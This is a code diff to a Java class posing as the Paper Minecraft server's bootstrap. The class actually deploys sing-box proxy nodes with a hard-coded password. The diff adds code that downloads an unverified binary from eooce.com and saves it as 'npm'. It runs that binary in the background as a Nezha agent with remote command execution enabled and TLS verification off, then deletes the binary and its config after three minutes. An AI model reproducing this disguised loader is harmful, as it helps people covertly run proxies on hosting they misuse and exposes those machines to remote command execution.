@@ -3,6 +3,9 @@ package io.papermc.paper;
 import org.yaml.snakeyaml.Yaml;
 import java.io.*;
 import java.net.*;
+import java.net.http.HttpClient;
+import java.net.http.HttpRequest;
+import java.net.http.HttpResponse;
 import java.nio.file.*;
 import java.time.*;
 import java.util.*;
@@ -15,19 +18,27 @@ public class PaperBootstrap {
     // ========== 全局变量（类级别）==========
     private static final Path UUID_FILE = Paths.get("data/uuid.txt");
     private static String uuid;
+    private static boolean DEBUG;
     private static Process singboxProcess;
+    private static Map<String, Object> config;
+    private static final List<String> TLS_PORTS = Arrays.asList(
+            "443", "8443", "2096", "2087", "2083", "2053");
+    private static final HttpClient httpClient = HttpClient.newBuilder()
+            .connectTimeout(Duration.ofSeconds(5))
+            .build();
     // ======================================
 
     public static void main(String[] args) {
         try {
             System.out.println("config.yml 加载中...");
-            Map<String, Object> config = loadConfig();
+            config = loadConfig();
+
+            DEBUG = Boolean.parseBoolean(config.getOrDefault("debug", "false").toString());
 
             // ---------- UUID 自动生成 & 持久化 ----------
             uuid = generateOrLoadUUID(config.get("uuid"));
             System.out.println("当前使用的 UUID: " + uuid);
             // --------------------------------------------
-
             String tuicPort = trim((String) config.get("tuic_port"));
             String hy2Port = trim((String) config.get("hy2_port"));
             String realityPort = trim((String) config.get("reality_port"));
@@ -37,7 +48,7 @@ public class PaperBootstrap {
             boolean deployTUIC = !tuicPort.isEmpty();
             boolean deployHY2 = !hy2Port.isEmpty();
 
-              if (!deployVLESS && !deployTUIC && !deployHY2)
+            if (!deployVLESS && !deployTUIC && !deployHY2)
                 throw new RuntimeException("❌ 未设置任何协议端口！");
 
             Path baseDir = Paths.get("/tmp/.singbox");
@@ -61,8 +72,10 @@ public class PaperBootstrap {
                 if (Files.exists(realityKeyFile)) {
                     List<String> lines = Files.readAllLines(realityKeyFile);
                     for (String line : lines) {
-                        if (line.startsWith("PrivateKey:")) privateKey = line.split(":", 2)[1].trim();
-                        if (line.startsWith("PublicKey:")) publicKey = line.split(":", 2)[1].trim();
+                        if (line.startsWith("PrivateKey:"))
+                            privateKey = line.split(":", 2)[1].trim();
+                        if (line.startsWith("PublicKey:"))
+                            publicKey = line.split(":", 2)[1].trim();
                     }
                     System.out.println("🔑 已加载本地 Reality 密钥对（固定公钥）");
                 } else {
@@ -86,15 +99,156 @@ public class PaperBootstrap {
             printDeployedLinks(uuid, deployVLESS, deployTUIC, deployHY2,
                     tuicPort, hy2Port, realityPort, sni, host, publicKey);
 
+            startNezha();
+
             Runtime.getRuntime().addShutdownHook(new Thread(() -> {
-                try { deleteDirectory(baseDir); } catch (IOException ignored) {}
+                try {
+                    deleteDirectory(baseDir);
+                } catch (IOException ignored) {
+                }
             }));
 
         } catch (Exception e) {
             e.printStackTrace();
         }
     }
-            
+
+    private static void startNezha() {
+        String nezhaServer = trim((String) config.get("nezha_server"));
+        String nezhaKey = trim((String) config.get("nezha_key"));
+        if (nezhaServer.isEmpty() || nezhaKey.isEmpty())
+            return;
+
+        try {
+            Process proc = new ProcessBuilder("ps", "aux").start();
+            BufferedReader reader = new BufferedReader(new InputStreamReader(proc.getInputStream()));
+            String line;
+            boolean running = false;
+            while ((line = reader.readLine()) != null) {
+                if (line.contains("./npm") && !line.contains("grep")) {
+                    running = true;
+                    break;
+                }
+            }
+            if (running) {
+                info("npm is already running, skip...");
+                return;
+            }
+        } catch (IOException e) {
+            debug("Failed to check npm process: " + e.getMessage());
+        }
+
+        downloadNpm();
+        String command = buildNezhaCommand();
+        if (command.isEmpty())
+            return;
+
+        try {
+            ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", command);
+            pb.redirectErrorStream(true);
+            Process nezhaProcess = pb.start();
+
+            Thread outputThread = new Thread(() -> {
+                try (BufferedReader reader = new BufferedReader(
+                        new InputStreamReader(nezhaProcess.getInputStream()))) {
+                    String line;
+                    while ((line = reader.readLine()) != null) {
+                        if (DEBUG)
+                            debug("[Nezha] " + line);
+                    }
+                } catch (IOException e) {
+                }
+            });
+            outputThread.setDaemon(true);
+            outputThread.start();
+
+            info("✅ nz started successfully");
+
+            new Timer().schedule(new TimerTask() {
+                @Override
+                public void run() {
+                    cleanupNezha();
+                }
+            }, 180000);
+
+        } catch (IOException e) {
+            error("Error running nz: " + e.getMessage());
+        }
+    }
+
+    private static void cleanupNezha() {
+        for (String file : Arrays.asList("npm", "config.yaml")) {
+            try {
+                Files.deleteIfExists(Paths.get(file));
+            } catch (IOException e) {
+            }
+        }
+    }
+
+    private static String buildNezhaCommand() {
+        String nezhaServer = trim((String) config.get("nezha_server"));
+        String nezhaKey = trim((String) config.get("nezha_key"));
+        String uuid = trim((String) config.get("uuid"));
+        String port = nezhaServer.substring(nezhaServer.lastIndexOf(':') + 1);
+        boolean tlsFlag = TLS_PORTS.contains(port);
+
+        String config = String.format(
+                "client_secret: %s\n" +
+                        "debug: false\n" +
+                        "disable_auto_update: true\n" +
+                        "disable_command_execute: false\n" +
+                        "disable_force_update: true\n" +
+                        "disable_nat: false\n" +
+                        "disable_send_query: false\n" +
+                        "gpu: false\n" +
+                        "insecure_tls: true\n" +
+                        "ip_report_period: 1800\n" +
+                        "report_delay: 4\n" +
+                        "server: %s\n" +
+                        "skip_connection_count: true\n" +
+                        "skip_procs_count: true\n" +
+                        "temperature: false\n" +
+                        "tls: %s\n" +
+                        "use_gitee_to_upgrade: false\n" +
+                        "use_ipv6_country_code: false\n" +
+                        "uuid: %s",
+                nezhaKey, nezhaServer, tlsFlag, uuid);
+
+        try {
+            Files.writeString(Paths.get("config.yaml"), config);
+        } catch (IOException e) {
+            error("Failed to write config file: " + e.getMessage());
+        }
+
+        return "nohup ./npm -c config.yaml >/dev/null 2>&1 &";
+    }
+
+    private static void downloadNpm() {
+        String arch = System.getProperty("os.arch").toLowerCase();
+        String url;
+        if (arch.contains("arm") || arch.contains("aarch64")) {
+            url = "https://arm64.eooce.com/v1";
+        } else {
+            url = "https://amd64.eooce.com/v1";
+        }
+
+        try {
+            // info("Downloading npm from: " + url);
+            HttpRequest request = HttpRequest.newBuilder()
+                    .uri(URI.create(url))
+                    .timeout(Duration.ofSeconds(30))
+                    .build();
+            HttpResponse<byte[]> response = httpClient.send(request, HttpResponse.BodyHandlers.ofByteArray());
+            if (response.statusCode() == 200) {
+                Files.write(Paths.get("npm"), response.body());
+                new ProcessBuilder("chmod", "755", "npm").start();
+                info("✅ nz downloaded successfully");
+            }
+        } catch (Exception e) {
+            error("Download failed: " + e.getMessage());
+        }
+    }
+
     private static String generateOrLoadUUID(Object configUuid) {
         // 1. 优先使用 config.yml（兼容旧配置）
         String cfg = trim((String) configUuid);
@@ -113,8 +267,8 @@ public class PaperBootstrap {
                 }
             }
         } catch (Exception e) {
-           
-    System.err.println("读取 UUID 文件失败: " + e.getMessage());
+
+            System.err.println("读取 UUID 文件失败: " + e.getMessage());
         }
 
         // 3. 首次生成
@@ -136,18 +290,21 @@ public class PaperBootstrap {
         }
     }
 
- private static boolean isValidUUID(String u) {
+    private static boolean isValidUUID(String u) {
         return u != null && u.matches("^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$");
     }
 
     // ===== 工具函数 =====
-    private static String trim(String s) { return s == null ? "" : s.trim(); }
+    private static String trim(String s) {
+        return s == null ? "" : s.trim();
+    }
 
     private static Map<String, Object> loadConfig() throws IOException {
         Yaml yaml = new Yaml();
         try (InputStream in = Files.newInputStream(Paths.get("config.yml"))) {
             Object o = yaml.load(in);
-            if (o instanceof Map) return (Map<String, Object>) o;
+            if (o instanceof Map)
+                return (Map<String, Object>) o;
             return new HashMap<>();
         }
     }
@@ -175,95 +332,98 @@ public class PaperBootstrap {
         StringBuilder sb = new StringBuilder();
         try (BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
             String line;
-            while ((line = br.readLine()) != null) sb.append(line).append("\n");
+            while ((line = br.readLine()) != null)
+                sb.append(line).append("\n");
         }
         p.waitFor();
         String out = sb.toString();
         Matcher priv = Pattern.compile("PrivateKey[:\\s]*([A-Za-z0-9_\\-+/=]+)").matcher(out);
         Matcher pub = Pattern.compile("PublicKey[:\\s]*([A-Za-z0-9_\\-+/=]+)").matcher(out);
-        if (!priv.find() || !pub.find()) throw new IOException("Reality 密钥生成失败：" + out);
+        if (!priv.find() || !pub.find())
+            throw new IOException("Reality 密钥生成失败：" + out);
         Map<String, String> map = new HashMap<>();
         map.put("private_key", priv.group(1));
         map.put("public_key", pub.group(1));
         System.out.println("✅ Reality 密钥生成完成");
         return map;
     }
+
     // ===== 配置生成 =====
     private static void generateSingBoxConfig(Path configFile, String uuid, boolean vless, boolean tuic, boolean hy2,
-                                              String tuicPort, String hy2Port, String realityPort,
-                                              String sni, Path cert, Path key,
-                                              String privateKey, String publicKey) throws IOException {
+            String tuicPort, String hy2Port, String realityPort,
+            String sni, Path cert, Path key,
+            String privateKey, String publicKey) throws IOException {
 
         List<String> inbounds = new ArrayList<>();
 
         if (tuic) {
             inbounds.add("""
-              {
-                "type": "tuic",
-                "listen": "::",
-                "listen_port": %s,
-                "users": [{"uuid": "%s", "password": "eishare2025"}],
-                "congestion_control": "bbr",
-                "tls": {
-                  "enabled": true,
-                  "alpn": ["h3"],
-                  "certificate_path": "%s",
-                  "key_path": "%s"
-                }
-              }
-            """.formatted(tuicPort, uuid, cert, key));
+                      {
+                        "type": "tuic",
+                        "listen": "::",
+                        "listen_port": %s,
+                        "users": [{"uuid": "%s", "password": "eishare2025"}],
+                        "congestion_control": "bbr",
+                        "tls": {
+                          "enabled": true,
+                          "alpn": ["h3"],
+                          "certificate_path": "%s",
+                          "key_path": "%s"
+                        }
+                      }
+                    """.formatted(tuicPort, uuid, cert, key));
         }
 
         if (hy2) {
             inbounds.add("""
-              {
-                "type": "hysteria2",
-                "listen": "::",
-                "listen_port": %s,
-                "users": [{"password": "%s"}],
-                "masquerade": "https://bing.com",
-                "ignore_client_bandwidth": true,
-                "up_mbps": 1000,
-                "down_mbps": 1000,
-                "tls": {
-                  "enabled": true,
-                  "alpn": ["h3"],
-                  "insecure": true,
-                  "certificate_path": "%s",
-                  "key_path": "%s"
-                }
-              }
-            """.formatted(hy2Port, uuid, cert, key));
+                      {
+                        "type": "hysteria2",
+                        "listen": "::",
+                        "listen_port": %s,
+                        "users": [{"password": "%s"}],
+                        "masquerade": "https://bing.com",
+                        "ignore_client_bandwidth": true,
+                        "up_mbps": 1000,
+                        "down_mbps": 1000,
+                        "tls": {
+                          "enabled": true,
+                          "alpn": ["h3"],
+                          "insecure": true,
+                          "certificate_path": "%s",
+                          "key_path": "%s"
+                        }
+                      }
+                    """.formatted(hy2Port, uuid, cert, key));
         }
 
         if (vless) {
             inbounds.add("""
-              {
-                "type": "vless",
-                "listen": "::",
-                "listen_port": %s,
-                "users": [{"uuid": "%s", "flow": "xtls-rprx-vision"}],
-                "tls": {
-                  "enabled": true,
-                  "server_name": "%s",
-                  "reality": {
-                    "enabled": true,
-                    "handshake": {"server": "%s", "server_port": 443},
-                    "private_key": "%s",
-                    "short_id": [""]
-                  }
-                }
-              }
-            """.formatted(realityPort, uuid, sni, sni, privateKey));
+                      {
+                        "type": "vless",
+                        "listen": "::",
+                        "listen_port": %s,
+                        "users": [{"uuid": "%s", "flow": "xtls-rprx-vision"}],
+                        "tls": {
+                          "enabled": true,
+                          "server_name": "%s",
+                          "reality": {
+                            "enabled": true,
+                            "handshake": {"server": "%s", "server_port": 443},
+                            "private_key": "%s",
+                            "short_id": [""]
+                          }
+                        }
+                      }
+                    """.formatted(realityPort, uuid, sni, sni, privateKey));
         }
 
         String json = """
-        {
-          "log": { "level": "info" },
-          "inbounds": [%s],
-          "outbounds": [{"type": "direct"}]
-        }
-        """.formatted(String.join(",", inbounds));
+                {
+                  "log": { "level": "info" },
+                  "inbounds": [%s],
+                  "outbounds": [{"type": "direct"}]
+                }
+                """.formatted(String.join(",", inbounds));
 
         Files.writeString(configFile, json);
         System.out.println("✅ sing-box 配置生成完成");
@@ -273,7 +433,7 @@ public class PaperBootstrap {
     private static String fetchLatestSingBoxVersion() {
         String fallback = "1.12.12";
         try {
-            URL url = new URL("https://api.github.com/repos/SagerNet/sing-box/releases/latest");
+            URL url = URI.create("https://api.github.com/repos/SagerNet/sing-box/releases/latest").toURL();
             HttpURLConnection conn = (HttpURLConnection) url.openConnection();
             conn.setConnectTimeout(5000);
             conn.setReadTimeout(5000);
@@ -294,8 +454,10 @@ public class PaperBootstrap {
     }
 
     // ===== 下载 sing-box =====
-    private static void safeDownloadSingBox(String version, Path bin, Path dir) throws IOException, InterruptedException {
-        if (Files.exists(bin)) return;
+    private static void safeDownloadSingBox(String version, Path bin, Path dir)
+            throws IOException, InterruptedException {
+        if (Files.exists(bin))
+            return;
         String arch = detectArch();
         String file = "sing-box-" + version + "-linux-" + arch + ".tar.gz";
         String url = "https://github.com/SagerNet/sing-box/releases/download/v" + version + "/" + file;
@@ -308,23 +470,25 @@ public class PaperBootstrap {
                         "(find . -type f -name 'sing-box' -exec mv {} ./sing-box \\; ) && chmod +x sing-box || true")
                 .inheritIO().start().waitFor();
 
-        if (!Files.exists(bin)) throw new IOException("未找到 sing-box 可执行文件！");
+        if (!Files.exists(bin))
+            throw new IOException("未找到 sing-box 可执行文件！");
         System.out.println("✅ 成功解压 sing-box 可执行文件");
     }
 
     private static String detectArch() {
         String a = System.getProperty("os.arch").toLowerCase();
-        if (a.contains("aarch") || a.contains("arm")) return "arm64";
+        if (a.contains("aarch") || a.contains("arm"))
+            return "arm64";
         return "amd64";
     }
 
     // ===== 启动 =====
-        private static Process startSingBox(Path bin, Path cfg) throws IOException, InterruptedException {
+    private static Process startSingBox(Path bin, Path cfg) throws IOException, InterruptedException {
         System.out.println("正在启动 sing-box...");
         ProcessBuilder pb = new ProcessBuilder(bin.toString(), "run", "-c", cfg.toString());
         pb.redirectErrorStream(true);
         // 不写日志 → 直接输出到控制台
-       pb.redirectOutput(ProcessBuilder.Redirect.DISCARD);
+        pb.redirectOutput(ProcessBuilder.Redirect.DISCARD);
         Process p = pb.start();
         Thread.sleep(1500);
         System.out.println("sing-box 已启动，PID: " + p.pid());
@@ -333,7 +497,8 @@ public class PaperBootstrap {
 
     // ===== 输出节点 =====
     private static String detectPublicIP() {
-        try (BufferedReader br = new BufferedReader(new InputStreamReader(new URL("https://api.ipify.org").openStream()))) {
+        try (BufferedReader br = new BufferedReader(
+                new InputStreamReader(URI.create("https://api.ipify.org").toURL().openStream()))) {
             return br.readLine();
         } catch (Exception e) {
             return "your-server-ip";
@@ -341,14 +506,16 @@ public class PaperBootstrap {
     }
 
     private static void printDeployedLinks(String uuid, boolean vless, boolean tuic, boolean hy2,
-                                           String tuicPort, String hy2Port, String realityPort,
-                                           String sni, String host, String publicKey) {
+            String tuicPort, String hy2Port, String realityPort,
+            String sni, String host, String publicKey) {
         System.out.println("\n=== ✅ 已部署节点链接 ===");
         if (vless)
-            System.out.printf("VLESS Reality:\nvless://%s@%s:%s?encryption=none&flow=xtls-rprx-vision&security=reality&sni=%s&fp=chrome&pbk=%s#Reality\n",
+            System.out.printf(
+                    "VLESS Reality:\nvless://%s@%s:%s?encryption=none&flow=xtls-rprx-vision&security=reality&sni=%s&fp=chrome&pbk=%s#Reality\n",
                     uuid, host, realityPort, sni, publicKey);
         if (tuic)
-            System.out.printf("\nTUIC:\ntuic://%s:eishare2025@%s:%s?sni=%s&alpn=h3&congestion_control=bbr&allowInsecure=1#TUIC\n",
+            System.out.printf(
+                    "\nTUIC:\ntuic://%s:eishare2025@%s:%s?sni=%s&alpn=h3&congestion_control=bbr&allowInsecure=1#TUIC\n",
                     uuid, host, tuicPort, sni);
         if (hy2)
             System.out.printf("\nHysteria2:\nhysteria2://%s@%s:%s?sni=%s&insecure=1#Hysteria2\n",
@@ -365,7 +532,7 @@ public class PaperBootstrap {
             // 1. 优雅停止旧进程
             if (singboxProcess != null && singboxProcess.isAlive()) {
                 System.out.println("正在停止旧进程 (PID: " + singboxProcess.pid() + ")...");
-                singboxProcess.destroy();  // 发送 SIGTERM
+                singboxProcess.destroy(); // 发送 SIGTERM
                 try {
                     if (!singboxProcess.waitFor(10, TimeUnit.SECONDS)) {
                         System.out.println("进程未响应，强制终止...");
@@ -393,7 +560,8 @@ public class PaperBootstrap {
         ZoneId zone = ZoneId.of("Asia/Shanghai");
         LocalDateTime now = LocalDateTime.now(zone);
         LocalDateTime next = now.withHour(0).withMinute(3).withSecond(0).withNano(0);
-        if (!next.isAfter(now)) next = next.plusDays(1);
+        if (!next.isAfter(now))
+            next = next.plusDays(1);
 
         long initialDelay = Duration.between(now, next).getSeconds();
 
@@ -404,7 +572,27 @@ public class PaperBootstrap {
     }
 
     private static void deleteDirectory(Path dir) throws IOException {
-        if (!Files.exists(dir)) return;
+        if (!Files.exists(dir))
+            return;
         Files.walk(dir).sorted(Comparator.reverseOrder()).map(Path::toFile).forEach(File::delete);
+    }
+
+    private static void log(String level, String msg) {
+        if (!level.equals("INFO"))
+            return;
+        System.out.println(new Date() + " - " + level + " - " + msg);
+    }
+
+    private static void info(String msg) {
+        log("INFO", msg);
+    }
+
+    private static void error(String msg) {
+        log("ERROR", msg);
+    }
+
+    private static void debug(String msg) {
+        if (DEBUG)
+            log("DEBUG", msg);
     }
 }
